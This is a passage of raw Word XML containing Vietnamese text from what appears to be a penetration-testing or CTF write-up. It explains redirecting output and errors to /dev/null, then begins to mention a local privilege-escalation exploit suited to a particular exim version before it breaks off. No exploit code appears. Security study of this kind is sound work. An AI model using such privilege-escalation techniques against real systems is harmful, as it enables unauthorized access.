          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>error</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sang</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>standard</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-9"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>output</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8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>standard</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-9"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>output</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đang</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trỏ</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tới</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-9"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/dev/null</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>error</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-9"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sẽ redirect tới</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9BFE6E" w14:textId="77777777" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="104" w:after="0" w:line="321" w:lineRule="auto"/>
        <w:ind w:right="575"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hiểu</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đơn</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>giản:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>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in</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ra</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>màn</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hình</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tất</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cả</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>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output</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>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error</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bằng</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cách</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đẩy</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dev/null</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>và</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cũng</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>là</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oại standard</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DC5F9B" w14:textId="153B6615" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="87" w:after="0" w:line="321" w:lineRule="auto"/>
        <w:ind w:right="303"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Một</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>khai</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thác</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>leo</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thang</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đặc</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>quyền</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>địa</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>phương</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>phù</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hợp</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>với</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>phiên</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bản</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exim</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>này</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>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cách</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chính</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xác</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nên</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
